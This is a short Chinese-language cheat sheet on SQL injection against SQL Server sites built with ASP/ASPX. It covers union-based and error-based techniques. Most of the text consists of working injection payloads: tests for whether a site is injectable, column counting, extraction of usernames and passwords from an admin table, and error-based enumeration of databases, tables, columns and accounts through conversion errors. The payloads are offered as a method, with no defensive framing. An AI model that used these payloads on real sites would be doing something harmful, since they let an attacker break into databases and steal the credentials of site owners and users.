sqlserver简单注入-联合注入-报错注入

sqlserver 经常与 asp aspx一起使用

操作系统大多是 win2012 win2018

数据库版本 sql2008 sql2012

sqlserver 三个权限级别

• sa权限：数据库操作，文件管理，命令执行，注册表读取等，最高权限

• db权限：文件管理，数据库操作等

• public权限：数据库操作等

注释符

--空格   单行注释

/**/ 多行注释

判断注入

' 单引号 是否报错

and 1=1   and 1=2   页面是否相同

判断列数

order by

联合注入

sqlserver对数据类型比较严谨

union select 1,2,3

表明，数据类型不全是int型，逐步调试

一般来说第一列都是id，对应的就是int型
union select 1,'2',3
union select 1,'2','3'

也可以通过  null  来查看

查询系统信息

db_name()  数据库名
@@version  版本信息
User_name()  当前用户
host_name()  计算机名称

查询数据

union select 1,username,password from admin

如果字段或者表名不存在，则会报错

报错注入

查询系统信息

and @@version>0
and user_name()>0
and db_name()>0
......

@@version是字符串，0是整数型；利用mssql在转换类型的时候出错，会提示信息

爆库

and (select top 1 name from master..sysdatabases)>0
查询所有数据库名中的第一个

查询所有数据库名，除了master
and (select top 1 name from master..sysdatabases where name not in ('master'))>0

查询所有数据库名，除了master,iNethinkCMS
and (select top 1 name from master..sysdatabases where name not in ('master','iNethinkCMS'))>0

爆表

查询指定库中的表名的第一个
and (select top 1 name from master.sys.all_objects where type='u' and is_ms_shipped=0)>0

and (select top 1 name from MYDB.sys.all_objects where type='U' AND is_ms_shipped=0 and name not in ('cmd','test_tmp'))>0

爆列

查询指定库指定表中的列名
and (select top 1 column_name from mydb.information_schema.columns where table_name='admin')>0

爆数据

爆用户名
and (select top 1 username from admin)>0

如果再也没有可爆的用户名，页面会显示正常
and (select top 1 username from admin where username not in ('admin'))>0